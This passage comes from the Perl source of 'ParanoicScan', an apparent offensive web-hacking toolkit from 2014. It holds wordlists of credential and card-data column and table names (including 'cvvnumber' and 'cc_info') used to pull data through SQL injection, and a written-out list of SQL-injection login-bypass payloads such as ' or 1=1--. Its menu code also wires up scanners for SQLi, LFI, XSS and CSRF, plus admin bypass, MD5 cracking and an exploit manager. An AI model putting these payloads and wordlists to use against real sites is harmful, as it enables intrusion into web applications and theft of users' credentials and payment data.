    'sid', 'sifra',
    'spacer', 'status',
    'store', 'store1',
    'store2', 'store3',
    'store4', 'table_prefix',
    'temp_pass', 'temp_password',
    'temppass', 'temppasword',
    'text', 'uid',
    'uname', 'user_admin',
    'user_icq', 'user_id',
    'user_ip', 'user_level',
    'user_login', 'user_n',
    'user_pass', 'user_passw',
    'user_passwd', 'user_pw',
    'user_pwd', 'user_pword',
    'user_pwrd', 'user_un',
    'user_uname', 'user_username',
    'user_usernm', 'user_usernun',
    'user_usrnm', 'user1',
    'useradmin', 'userid',
    'userip', 'userlogin',
    'usern', 'usernm',
    'userpass', 'userpassword',
    'userpw', 'userpwd',
    'usr_n', 'usr_name',
    'usr_pass', 'usr2',
    'usrn', 'usrnam',
    'usrname', 'usrnm',
    'usrpass', 'warez',
    'xar_name', 'xar_pass',
    'nom dutilisateur', 'mot de passe',
    'compte', 'comptes',
    'aide', 'objectif',
    'authentifier', 'authentification',
    'Contact', 'fissure',
    'client', 'clients',
    'de donn?es', 'mot_de_passe_bdd',
    't?l?charger', 'E-mail',
    'adresse e-mail', 'Emer',
    'complet', 'groupe',
    'hachage', 'Page daccueil',
    'Kodi', 'nom',
    'connexion', 'membre',
    'MEMBERNAME', 'mon_mot_de_passe',
    'monmotdepasse', 'ignatiusj',
    'caroline-du-nord', 'nouveau',
    'Nick', 'passer',
    'Passw', 'Mot de passe',
    't?l?phone', 'protection de la vie priv?e',
    'PSW', 'pWord',
    'sel', 'recherche',
    'de s?rie', 'param?tre',
    '?tat', 'stocker',
    'texte', 'cvvnumber'
);
811 | my @buscar2 = ( | |
812 | 'name', 'user', | |
813 | 'user_name', 'user_username', | |
814 | 'uname', 'user_uname', | |
815 | 'usern', 'user_usern', | |
816 | 'un', 'user_un', | |
817 | 'mail', 'cliente', | |
818 | 'usrnm', 'user_usrnm', | |
819 | 'usr', 'admin_name', | |
820 | 'cla_adm', 'usu_adm', | |
821 | 'fazer', 'logon', | |
822 | 'fazerlogon', 'authorization', | |
823 | 'membros', 'utilizadores', | |
824 | 'sysadmin', 'email', | |
825 | 'senha', 'username', | |
826 | 'usernm', 'user_usernm', | |
827 | 'nm', 'user_nm', | |
828 | 'login', 'u_name', | |
829 | 'nombre', 'host', | |
830 | 'pws', 'cedula', | |
831 | 'userName', 'host_password', | |
832 | 'chave', 'alias', | |
833 | 'apellido_nombre', 'cliente_nombre', | |
834 | 'cliente_email', 'cliente_pass', | |
835 | 'cliente_user', 'cliente_usuario', | |
836 | 'login_id', 'sistema_id', | |
837 | 'author', 'user_login', | |
838 | 'admin_user', 'admin_pass', | |
839 | 'uh_usuario', 'uh_password', | |
840 | 'psw', 'host_username', | |
841 | 'sistema_usuario', 'auth', | |
842 | 'key', 'usuarios_nombre', | |
843 | 'usuarios_nick', 'usuarios_password', | |
844 | 'user_clave', 'membername', | |
845 | 'nme', 'unme', | |
846 | 'password', 'user_password', | |
847 | 'autores', 'pass_hash', | |
848 | 'hash', 'pass', | |
849 | 'correo', 'usuario_nombre', | |
850 | 'usuario_nick', 'usuario_password', | |
851 | 'userpass', 'user_pass', | |
852 | 'upw', 'pword', | |
853 | 'user_pword', 'passwd', | |
854 | 'user_passwd', 'passw', | |
855 | 'user_passw', 'pwrd', | |
856 | 'user_pwrd', 'pwd', | |
857 | 'authors', 'user_pwd', | |
858 | 'u_pass', 'clave', | |
859 | 'usuario', 'contrasena', | |
860 | 'pas', 'sistema_password', | |
861 | 'autor', 'upassword', | |
862 | 'web_password', 'web_username', | |
863 | 'tbladmins', 'sort', | |
864 | '_wfspro_admin', '4images_users', | |
865 | 'a_admin', 'account', | |
866 | 'accounts', 'adm', | |
867 | 'admin', 'admin_login', | |
868 | 'admin_userinfo', 'administer', | |
869 | 'administrable', 'administrate', | |
870 | 'administration', 'administrator', | |
871 | 'administrators', 'adminrights', | |
872 | 'admins', 'adminuser', | |
873 | 'art', 'article_admin', | |
874 | 'articles', 'artikel', | |
875 | 'ÃÜÂë', 'aut', | |
876 | 'autore', 'backend', | |
877 | 'backend_users', 'backenduser', | |
878 | 'bbs', 'book', | |
879 | 'chat_config', 'chat_messages', | |
880 | 'chat_users', 'client', | |
881 | 'clients', 'clubconfig', | |
882 | 'company', 'config', | |
883 | 'contact', 'contacts', | |
884 | 'content', 'control', | |
885 | 'cpg_config', 'cpg132_users', | |
886 | 'customer', 'customers', | |
887 | 'customers_basket', 'dbadmins', | |
888 | 'dealer', 'dealers', | |
889 | 'diary', 'download', | |
890 | 'Dragon_users', 'e107.e107_user', | |
891 | 'e107_user', 'forum.ibf_members', | |
892 | 'fusion_user_groups', 'fusion_users', | |
893 | 'group', 'groups', | |
894 | 'ibf_admin_sessions', 'ibf_conf_settings', | |
895 | 'ibf_members', 'ibf_members_converge', | |
896 | 'ibf_sessions', 'icq', | |
897 | 'images', 'index', | |
898 | 'info', 'ipb.ibf_members', | |
899 | 'ipb_sessions', 'joomla_users', | |
900 | 'jos_blastchatc_users', 'jos_comprofiler_members', | |
901 | 'jos_contact_details', 'jos_joomblog_users', | |
902 | 'jos_messages_cfg', 'jos_moschat_users', | |
903 | 'jos_users', 'knews_lostpass', | |
904 | 'korisnici', 'kpro_adminlogs', | |
905 | 'kpro_user', 'links', | |
906 | 'login_admin', 'login_admins', | |
907 | 'login_user', 'login_users', | |
908 | 'logins', 'logs', | |
909 | 'lost_pass', 'lost_passwords', | |
910 | 'lostpass', 'lostpasswords', | |
911 | 'm_admin', 'main', | |
912 | 'mambo_session', 'mambo_users', | |
913 | 'manage', 'manager', | |
914 | 'mb_users', 'member', | |
915 | 'memberlist', 'members', | |
916 | 'minibbtable_users', 'mitglieder', | |
917 | 'movie', 'movies', | |
918 | 'mybb_users', 'mysql', | |
919 | 'mysql.user', 'names', | |
920 | 'news', 'news_lostpass', | |
921 | 'newsletter', 'nuke_authors', | |
922 | 'nuke_bbconfig', 'nuke_config', | |
923 | 'nuke_popsettings', 'nuke_users', | |
924 | 'Óû§', 'obb_profiles', | |
925 | 'order', 'orders', | |
926 | 'parol', 'partner', | |
927 | 'partners', 'passes', | |
928 | 'passwords', 'perdorues', | |
929 | 'perdoruesit', 'phorum_session', | |
930 | 'phorum_user', 'phorum_users', | |
931 | 'phpads_clients', 'phpads_config', | |
932 | 'phpbb_users', 'phpBB2.forum_users', | |
933 | 'phpBB2.phpbb_users', 'phpmyadmin.pma_table_info', | |
934 | 'pma_table_info', 'poll_user', | |
935 | 'punbb_users', 'pwds', | |
936 | 'reg_user', 'reg_users', | |
937 | 'registered', 'reguser', | |
938 | 'regusers', 'session', | |
939 | 'sessions', 'settings', | |
940 | 'shop.cards', 'shop.orders', | |
941 | 'site_login', 'site_logins', | |
942 | 'sitelogin', 'sitelogins', | |
943 | 'sites', 'smallnuke_members', | |
944 | 'smf_members', 'SS_orders', | |
945 | 'statistics', 'superuser', | |
946 | 'sysadmins', 'system', | |
947 | 'sysuser', 'sysusers', | |
948 | 'table', 'tables', | |
949 | 'tb_admin', 'tb_administrator', | |
950 | 'tb_login', 'tb_member', | |
951 | 'tb_members', 'tb_user', | |
952 | 'tb_username', 'tb_usernames', | |
953 | 'tb_users', 'tbl', | |
954 | 'tbl_user', 'tbl_users', | |
955 | 'tbluser', 'tbl_clients', | |
956 | 'tbl_client', 'tblclients', | |
957 | 'tblclient', 'test', | |
958 | 'usebb_members', 'user_admin', | |
959 | 'user_info', 'user_list', | |
960 | 'user_logins', 'user_names', | |
961 | 'usercontrol', 'userinfo', | |
962 | 'userlist', 'userlogins', | |
963 | 'usernames', 'userrights', | |
964 | 'users', 'vb_user', | |
965 | 'vbulletin_session', 'vbulletin_user', | |
966 | 'voodoo_members', 'webadmin', | |
967 | 'webadmins', 'webmaster', | |
968 | 'webmasters', 'webuser', | |
969 | 'webusers', 'x_admin', | |
970 | 'xar_roles', 'xoops_bannerclient', | |
971 | 'xoops_users', 'yabb_settings', | |
972 | 'yabbse_settings', 'ACT_INFO', | |
973 | 'ActiveDataFeed', 'Category', | |
974 | 'CategoryGroup', 'ChicksPass', | |
975 | 'ClickTrack', 'Country', | |
976 | 'CountryCodes1', 'CustomNav', | |
977 | 'DataFeedPerformance1', 'DataFeedPerformance2', | |
978 | 'DataFeedPerformance2_incoming', 'DataFeedShowtag1', | |
979 | 'DataFeedShowtag2', 'DataFeedShowtag2_incoming', | |
980 | 'dtproperties', 'Event', | |
981 | 'Event_backup', 'Event_Category', | |
982 | 'EventRedirect', 'Events_new', | |
983 | 'Genre', 'JamPass', | |
984 | 'MyTicketek', 'MyTicketekArchive', | |
985 | 'News', 'PerfPassword', | |
986 | 'PerfPasswordAllSelected', 'Promotion', | |
987 | 'ProxyDataFeedPerformance', 'ProxyDataFeedShowtag', | |
988 | 'ProxyPriceInfo', 'Region', | |
989 | 'SearchOptions', 'Series', | |
990 | 'Sheldonshows', 'StateList', | |
991 | 'States', 'SubCategory', | |
992 | 'Subjects', 'Survey', | |
993 | 'SurveyAnswer', 'SurveyAnswerOpen', | |
994 | 'SurveyQuestion', 'SurveyRespondent', | |
995 | 'sysconstraints', 'syssegments', | |
996 | 'tblRestrictedPasswords', 'tblRestrictedShows', | |
997 | 'TimeDiff', 'Titles', | |
998 | 'ToPacmail1', 'ToPacmail2', | |
999 | 'UserPreferences', 'uvw_Category', | |
1000 | 'uvw_Pref', 'uvw_Preferences', | |
1001 | 'Venue', 'venues', | |
1002 | 'VenuesNew', 'X_3945', | |
1003 | 'tblArtistCategory', 'tblArtists', | |
1004 | 'tblConfigs', 'tblLayouts', | |
1005 | 'tblLogBookAuthor', 'tblLogBookEntry', | |
1006 | 'tblLogBookImages', 'tblLogBookImport', | |
1007 | 'tblLogBookUser', 'tblMails', | |
1008 | 'tblNewCategory', 'tblNews', | |
1009 | 'tblOrders', 'tblStoneCategory', | |
1010 | 'tblStones', 'tblUser', | |
1011 | 'tblWishList', 'VIEW1', | |
1012 | 'viewLogBookEntry', 'viewStoneArtist', | |
1013 | 'vwListAllAvailable', 'CC_info', | |
1014 | 'CC_username', 'cms_user', | |
1015 | 'cms_users', 'cms_admin', | |
1016 | 'cms_admins', 'jos_user', | |
1017 | 'table_user', 'bulletin', | |
1018 | 'cc_info', 'login_name', | |
1019 | 'admuserinfo', 'userlistuser_list', | |
1020 | 'SiteLogin', 'Site_Login', | |
1021 | 'UserAdmin', 'Admins', | |
1022 | 'Login', 'Logins' | |
1023 | ); | |
1024 | ||
1025 | my @bypass = split /\n/, <<'EOS'; | |
1026 | admin'-- | |
1027 | 'or'1'='1 | |
1028 | 'or' | |
1029 | ' or 0=0 -- | |
1030 | " or 0=0 -- | |
1031 | or 0=0 -- | |
1032 | ' or 0=0 # | |
1033 | " or 0=0 # | |
1034 | or 0=0 # | |
1035 | ' or 'x'='x | |
1036 | " or "x"="x | |
1037 | ') or ('x'='x | |
1038 | ' or 1=1-- | |
1039 | " or 1=1-- | |
1040 | or 1=1-- | |
1041 | ' or a=a-- | |
1042 | " or "a"="a | |
1043 | ') or ('a'='a | |
1044 | ") or ("a"="a | |
1045 | hi" or "a"="a | |
1046 | hi" or 1=1 -- | |
1047 | hi' or 1=1 -- | |
1048 | hi' or 'a'='a | |
1049 | hi') or ('a'='a | |
1050 | hi") or ("a"="a | |
1051 | - ' or 'x'='x | |
1052 | - ' or 'x'='x | |
1053 | 'or'1 ou 'or''=' | |
1054 | ' or 'x'='x | |
1055 | admin' or 1==1 | |
1056 | ' OR "=' | |
1057 | 'or'1'='1 | |
1058 | EOS | |
1059 | ||
# Log sources read by genlogs().  Entries are matched by position with
# @files_chau_gen (genlogs() indexes both arrays with the same counter), so
# the order of the two lists must stay in step.
my @files_gen = qw(
  kobra            sql-logs.txt
  logs-bypass.txt  jetdb-logs.txt
  mssql-logs.txt   oracle-logs.txt
  rfi-logs.txt     lfi-logs.txt
  xss-logs.txt     fpd-logs.txt
  csrf             fsd
  paths-logs.txt   admin-logs.txt
  hashes-found.txt http-logs.txt
  exploitdb
);
1071 | ||
# HTML report pages under logs_html/.  genlogs() deletes each of these before
# regenerating them, and pairs them by index with @files_gen.
my @files_chau_gen = qw(
  kobra.html  sqli.html    bypass.html  jetdb.html
  mssql.html  oracle.html  rfi.html     lfi.html
  xss.html    fpd.html     csrf.html    fsd.html
  paths.html  admin.html   hash.html    http.html
  exploitdb.html
);
1079 | ||
1080 | my $comienzo_html = qq( | |
1081 | <title>Logs - ParanoicScan -</title> | |
1082 | ||
1083 | <STYLE type=text/css> | |
1084 | ||
1085 | body,a:link { | |
1086 | background-color: #000000; | |
1087 | color:#00FF00; | |
1088 | Courier New; | |
1089 | cursor:crosshair; | |
1090 | font: normal 0.7em sans-serif,Arial; | |
1091 | } | |
1092 | ||
1093 | input,textarea,fieldset,select,table,td,tr,option,select { | |
1094 | font: normal 15px Verdana, Arial, Helvetica, | |
1095 | sans-serif; | |
1096 | background-color:#000000; | |
1097 | color:#00FF00; | |
1098 | border: solid 1px #00FF00; | |
1099 | border-color:#00FF00 | |
1100 | } | |
1101 | ||
1102 | a:link,a:visited,a:active { | |
1103 | color:#00FF00; | |
1104 | font: normal 15px Verdana, Arial, Helvetica, | |
1105 | sans-serif; | |
1106 | text-decoration: none; | |
1107 | } | |
1108 | ||
1109 | </style> | |
1110 | ||
1111 | <center> | |
1112 | <br><h1>Logs - ParanoicScan -</h1><br><br> | |
1113 | ); | |
1114 | ||
1115 | my $final_html = qq( | |
1116 | <br><br><h1><b>-- == (C) Doddy Hackman 2014 == --</b></h1> | |
1117 | ||
1118 | </center>); | |
1119 | ||
1120 | my $logs_index = qq( | |
1121 | <title>Logs - ParanoicScan -</title> | |
1122 | ||
1123 | <STYLE type=text/css> | |
1124 | ||
1125 | body,a:link { | |
1126 | background-color: #000000; | |
1127 | color:#00FF00; | |
1128 | Courier New; | |
1129 | cursor:crosshair; | |
1130 | font: normal 0.7em sans-serif,Arial; | |
1131 | } | |
1132 | ||
1133 | input,textarea,fieldset,select,table,td,tr,option,select { | |
1134 | font: normal 15px Verdana, Arial, Helvetica, | |
1135 | sans-serif; | |
1136 | background-color:#000000; | |
1137 | color:#00FF00; | |
1138 | border: solid 1px #00FF00; | |
1139 | border-color:#00FF00 | |
1140 | } | |
1141 | ||
1142 | a:link,a:visited,a:active { | |
1143 | color:#00FF00; | |
1144 | font: normal 15px Verdana, Arial, Helvetica, | |
1145 | sans-serif; | |
1146 | text-decoration: none; | |
1147 | } | |
1148 | ||
1149 | </style> | |
1150 | ||
1151 | <center> | |
1152 | <br><h1>Logs - ParanoicScan -</h1><br><br> | |
1153 | <table border=1> | |
1154 | <td><b>Logs</b></td><tr> | |
1155 | <td><a href=kobra.html>K0bra</a></td><tr> | |
1156 | <td><a href=sqli.html>SQLI Links</a></td><tr> | |
1157 | <td><a href=bypass.html>ByPass</a></td><tr> | |
1158 | <td><a href=jetdb.html>JetDB</a></td><tr> | |
1159 | <td><a href=mssql.html>MSSQL</a></td><tr> | |
1160 | <td><a href=oracle.html>Oracle</a></td><tr> | |
1161 | <td><a href=rfi.html>RFI</a></td><tr> | |
1162 | <td><a href=lfi.html>LFI</a></td><tr> | |
1163 | <td><a href=xss.html>XSS</a></td><tr> | |
1164 | <td><a href=fpd.html>Full Path Discloure</a></td><tr> | |
1165 | <td><a href=csrf.html>Cross Site Request Forgery</a></td><tr> | |
1166 | <td><a href=fsd.html>Full Source Discloure</a></td><tr> | |
1167 | <td><a href=paths.html>Paths</a></td><tr> | |
1168 | <td><a href=admin.html>Admins</a></td><tr> | |
1169 | <td><a href=hash.html>Hashes</a></td><tr> | |
1170 | <td><a href=http.html>HTTP FingerPrinting</a></td><tr> | |
1171 | <td><a href=exploitdb.html>ExploitDB</a></td><tr> | |
1172 | </table> | |
1173 | ||
1174 | <br><br><h1><b>-- == (C) Doddy Hackman 2014 == --</b></h1> | |
1175 | ||
1176 | </center> | |
1177 | ); | |
1178 | ||
# Directory tree for raw logs (logs/) and their HTML copies (logs_html/).
# Parents are listed before their children because the directories are
# created in this order.
my @logs_central = qw(
  logs
  logs_html
  logs/webs
  logs/fsdlogs
  logs/csrf
  logs/exploitdb/
  logs_html/webs
  logs_html/fsdlogs
  logs_html/csrf
  logs_html/exploitdb/
);
1186 | ||
1187 | ## | |
1188 | ||
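# Create the log directory tree listed in @logs_central.
#
# The original follow-up call `chmod $log, "0777"` had its arguments reversed
# (chmod takes the MODE first, then the files), so it never changed these
# directories; it is dropped.  The directories hold the program's log files,
# so they are created owner-only rather than world-writable.
for my $log (@logs_central) {
    next if -d $log;    # already present from an earlier run
    mkdir( $log, 0700 )
      or warn "Could not create log directory '$log': $!\n";
}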
1193 | ||
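# Write the static index page of the HTML log viewer the first time the
# program runs in this directory.  An existing logs.html is left untouched.
{
    my $index_path = getcwd() . "/" . "logs_html/logs.html";

    unless ( -f $index_path ) {

        # Three-argument open with a lexical handle: the path is never parsed
        # for a mode prefix, and a failure is reported instead of ignored.
        if ( open( my $index_fh, '>>', $index_path ) ) {
            print {$index_fh} $logs_index;
            close $index_fh
              or warn "Could not finish writing '$index_path': $!\n";
        }
        else {
            warn "Could not create '$index_path': $!\n";
        }
    }
}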
1199 | ||
# Shared HTTP client: the User-Agent string is picked at random from @agents
# and every request times out after 10 seconds.
my $nave = LWP::UserAgent->new(
    agent   => $agents[ rand @agents ],
    timeout => 10,
);

my $total_vulnerables;

## Proxy settings

# getdatanownownownow() is defined elsewhere; presumably it returns the saved
# settings text (confirm against its definition).  When that text carries a
# "proxy=" entry, the value is registered as the proxy for the "http" scheme.
my $te = getdatanownownownow();
my ($now_proxy) = $te =~ /proxy=(.*)/;

if ( defined $now_proxy ) {
    $nave->proxy( "http", "http://" . $now_proxy );
}
1215 | ||
1216 | inicio_total(); | |
1217 | ||
# Entry screen.  Runs the first-time setup when data.txt does not exist;
# otherwise asks for the login and opens the main menu on success.  A failed
# login waits for Enter and starts over.  Ends through copyright_menu().
sub inicio_total {

    head_menu();

    if ( !-f "data.txt" ) {

        # No saved settings yet
        instalar();
    }
    else {

        # Start the menu
        my $login_ok = menu_login() eq "yes";
        printear( "\n\n\t\t\t [+] Checking ...\n\n", "text", "7", "5" );
        sleep(3);

        if ($login_ok) {
            estoydentro();
        }
        else {
            printear( "\n\t\t\t [-] Bad Login\n\n", "text", "5", "5" );
            <stdin>;    # wait for Enter before asking again
            inicio_total();
        }
    }

    copyright_menu();
}
1242 | ||
1243 | #Final | |
1244 | ||
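# Main menu: draw the header and the option list, read one option and run the
# feature that belongs to it.  Any input that is not a known option number
# redraws the menu.
#
# Fix over the original: when standard input is closed, printear() returns
# undef, which matched no option and sent the fallback branch into
# estoydentro() again without end.  The sub now returns in that case.
sub estoydentro {
    head_menu();
    menu_central();
    my $op = printear( "\n\n\t\t\t[+] Option : ", "stdin", "11", "13" );

    # End of input: nothing more can be read, so stop instead of recursing.
    return unless defined $op;

    # Ctrl-C inside a feature brings the user back to this menu.
    $SIG{INT} = \&estoydentroporahora; ## Comment on this line to compile to exe

    # Option number (as typed) => code to run.  Keys are compared as strings,
    # exactly like the original `eq` chain.
    my %accion_de = (
        "1"  => \&load_paranoic_old,
        "2"  => \&load_kobra,
        "3"  => \&lfi_scan,
        "4"  => \&xss_scan,
        "5"  => \&csrf_scan,
        "6"  => \&load_bypass,
        "7"  => \&load_fsd,
        "8"  => \&load_findpaths,
        "9"  => \&load_locateip,
        "10" => sub {
            menu_crackhash();
            adios();
        },
        "11" => sub {
            clean();
            start_panel();
        },
        "12" => \&httpfinger,
        "13" => \&portscanner,
        "14" => \&encodedecode,
        "15" => \&exploitdb,
        "16" => \&mysqlman,
        "17" => \&load_cmd,
        "18" => sub {
            cargarlogs("logs_html/logs.html");
            estoydentro();
        },
        "19" => sub {
            head_menu();
            printear(
"\n\n\t This program was coded By Doddy Hackman in the year 2014\n\n\n\n",
                "text", "13", "5"
            );
            <stdin>;    # wait for Enter
            estoydentro();
        },
        "20" => sub {

            # Waits for Enter, regenerates the HTML logs, then quits.
            printear( "\n\n\t\t\t[+] Good Bye\n", "stdin", "7", "13" );
            genlogs();
            exit(1);
        },
    );

    my $accion = exists $accion_de{$op} ? $accion_de{$op} : \&estoydentro;
    $accion->();
}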
1327 | ||
# Wait for the user to press Enter, then show the main menu again.
# estoydentro() also installs this sub as the SIGINT handler.
sub estoydentroporahora {
    my $aviso = "\n\n\n\t\t[+] Press any key for return to the menu";
    printear( $aviso, "stdin", "7", "13" );    # typed text is discarded

    estoydentro();
}
1335 | ||
# Print the list of main-menu options.  The numbers shown here are the ones
# estoydentro() compares the typed option against.
sub menu_central {

    printear( "\n\n\t\t\t -- == Options == --\n\n", "text", "13", "5" );

    my @opciones = (
        "1 : Web Scanner",
        "2 : SQLi Scanner",
        "3 : LFI Scanner",
        "4 : XSS Tool",
        "5 : CSRF Tool",
        "6 : Bypass Admin",
        "7 : FSD Exploit Manager",
        "8 : Paths Finder",
        "9 : Locate IP",
        "10 : Crack MD5",
        "11 : Panel Finder",
        "12 : HTTP FingerPrinting",
        "13 : Port Scanner",
        "14 : Encoder & Decoder",
        "15 : Exploit DB Manager",
        "16 : Mysql Manager",
        "17 : Console",
        "18 : Generate LOGS",
        "19 : About",
        "20 : Exit",
    );

    # Two leading newlines, then one indented "[+]" line per option.
    my $listado = "\n\n" . join( "", map { "\t\t\t[+] " . $_ . "\n" } @opciones );

    printear( $listado, "logos", "7", "5" );
}
1364 | ||
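# Ask for the login and compare it with the digests kept in the saved
# settings.
#
# Returns the string "yes" when both the username and the password match,
# and "no" in every other case (including missing or malformed settings).
#
# NOTE(review): both values are stored and compared as unsalted MD5 hex
# digests.  MD5 is not suitable for password storage; replacing it with a
# salted, slow key-derivation function needs a matching change in instalar()
# and in the data.txt format, so it is only flagged here.
sub menu_login {

    printear( "\n\n\t\t\t -- == Login == --\n\n\n\n", "text", "13", "5" );
    my $username = printear( "\t\t\t[+] Username : ",   "stdin", "11", "13" );
    my $password = printear( "\n\t\t\t[+] Password : ", "stdin", "11", "13" );

    my $word = getdatanownownownow();
    $word = "" unless defined $word;

    # Each setting must start its own line and carry exactly a 32-digit hex
    # digest (what instalar() writes).  The original unanchored patterns
    # could also match "username=" or "password=" inside another value.
    my ($test_username) = $word =~ /^username=([0-9a-f]{32})\s*$/m;
    my ($test_password) = $word =~ /^password=([0-9a-f]{32})\s*$/m;

    # Fail closed when a digest is missing or the prompts returned nothing.
    return "no" unless defined $test_username and defined $test_password;
    return "no" unless defined $username      and defined $password;

    my $coincide = $test_username eq md5_hex($username)
      && $test_password eq md5_hex($password);

    return $coincide ? "yes" : "no";
}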
1394 | ||
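# First-run setup: ask for the login, an optional proxy and the two display
# switches, store them in data.txt and return to the start screen.
#
# data.txt receives one "key=value" line per setting.  The username and the
# password are stored as MD5 hex digests; the proxy line is written only when
# a proxy was entered.
#
# NOTE(review): unsalted MD5 is a weak way to store a password; see
# menu_login(), which must change together with this sub.
sub instalar {
    printear(
        "\n\n\t\t\t -- == Program settings == --\n\n\n\n", "text",
        "13", "5"
    );

    my $username = printear( "\t\t\t[+] Username : ",   "stdin", "11", "13" );
    my $password = printear( "\n\t\t\t[+] Password : ", "stdin", "11", "13" );
    my $proxy    = printear( "\n\t\t\t[+] Proxy : ",    "stdin", "11", "13" );
    my $colores =
      printear( "\n\t\t\t[+] Colors [y,n] : ", "stdin", "11", "13" );
    my $efectos =
      printear( "\n\t\t\t[+] Effects [y,n] : ", "stdin", "11", "13" );

    # Lexical handle and three-argument open.  A failure stops here: the
    # original ignored it and went back to the start screen, which found no
    # data.txt and asked for the settings again.
    open( my $datos_fh, '>>', 'data.txt' )
      or die "Could not open data.txt for writing: $!\n";

    # The file holds the login digests and the proxy address: owner-only.
    chmod( 0600, 'data.txt' )
      or warn "Could not restrict permissions on data.txt: $!\n";

    print {$datos_fh} "username=" . md5_hex($username) . "\n";
    print {$datos_fh} "password=" . md5_hex($password) . "\n";
    if ( defined $proxy and $proxy ne "" ) {
        print {$datos_fh} "proxy=" . $proxy . "\n";
    }
    print {$datos_fh} "colors=" . $colores . "\n";
    print {$datos_fh} "efect=" . $efectos . "\n";

    # Buffered write errors only surface when the handle is closed.
    close $datos_fh
      or die "Could not finish writing data.txt: $!\n";

    inicio_total();
}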
1421 | ||
1422 | sub head_menu { | |
1423 | clean(); | |
1424 | printear( " | |
1425 | ||
1426 | ||
1427 | @@@@@ @ @@@@ @ @@ @@@ @@@ @@@ @@@@ @@@ @@@@ @ @@ @@@ | |
1428 | @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@ @ | |
1429 | @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @@ @ | |
1430 | @@@ @ @ @@@ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ | |
1431 | @ @@@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ | |
1432 | @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @@ | |
1433 | @@@ @@@ @@@@@@ @@@@ @@@@@@ @ @@@ @@@ @@@ @@@ @@@ @@@ @@@@@@ @ | |
1434 | ||
1435 | ||
1436 | ", "logos", "13", "5" ); | |
1437 | ||
1438 | if ( $^O =~ /Win32/ ) { | |
1439 | ||
1440 | printear( " | |
1441 | ||
1442 | \t\t _____ | |
1443 | \t\t ,----/,--. `. | |
1444 | \t\t / '. `-' \ | |
1445 | \t\t | ____ \ '`|_ | |
1446 | \t\t \'.--._/` _ \ '. | |
1447 | \t\t /'-|/ \|`\|-` \ | |
1448 | \t\t / / \ | | |
1449 | \t\t | ; '` | .' | |
1450 | \t\t '. |;; ; / | |
1451 | \t\t \ \ ; / ,' | |
1452 | \t\t ;--, .,--, | |
1453 | \t\t __||=|=|./|=|=||___ | |
1454 | \t\t `'-'-' `-'-'` | |
1455 | \t\t ______________________ | |
1456 | \t\t /'/ / \ \ \ | |
1457 | \t\t / '.'; ; \ ' \ | |
1458 | \t\t '-/ | ; | ; \-' | |
1459 | \t\t \_| | | |_/ | |
1460 | \t\t `-'\_/`-' | |
1461 | \t\t | |
1462 | ||
1463 | ", "logos", "7", "5" ); | |
1464 | ||
1465 | } | |
1466 | else { | |
1467 | ||
1468 | printear( " | |
1469 | ||
1470 | ||
1471 | ||
1472 | \t\t ¾¾¾¾¾¾¾¾¾¾¾ | |
1473 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1474 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1475 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1476 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1477 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1478 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1479 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1480 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1481 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1482 | \t\t ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾ | |
1483 | \t\t ¾¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾ | |
1484 | \t\t ¾¾¾ ¾¾¾ ¾¾¾ ¾¾¾ | |
1485 | \t\t ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾ | |
1486 | \t\t ¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾ | |
1487 | \t\t ¾¾¾¾¾¾¾¾¾ ¾ ¾¾¾¾¾¾¾¾¾ | |
1488 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1489 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1490 | \t\t ¾ ¾¾¾¾¾¾¾¾¾¾ ¾ | |
1491 | \t\t ¾ ¾ ¾¾¾¾ ¾ ¾ | |
1492 | \t\t ¾ ¾¾ ¾¾ | |
1493 | \t\t ¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1494 | \t\t ¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾ | |
1495 | \t\t ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾ | |
1496 | \t\t ¾¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾¾¾¾¾¾ | |
1497 | \t\t ¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ | |
1498 | \t\t ¾¾¾¾¾¾ ¾¾¾¾¾¾¾ | |
1499 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾ | |
1500 | \t\t ¾¾¾¾¾¾¾¾¾ | |
1501 | \t\t ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ | |
1502 | \t\t ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ | |
1503 | \t\t ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾ | |
1504 | \t\t ¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾ | |
1505 | \t\t ¾¾¾¾¾¾ ¾¾¾¾¾¾ | |
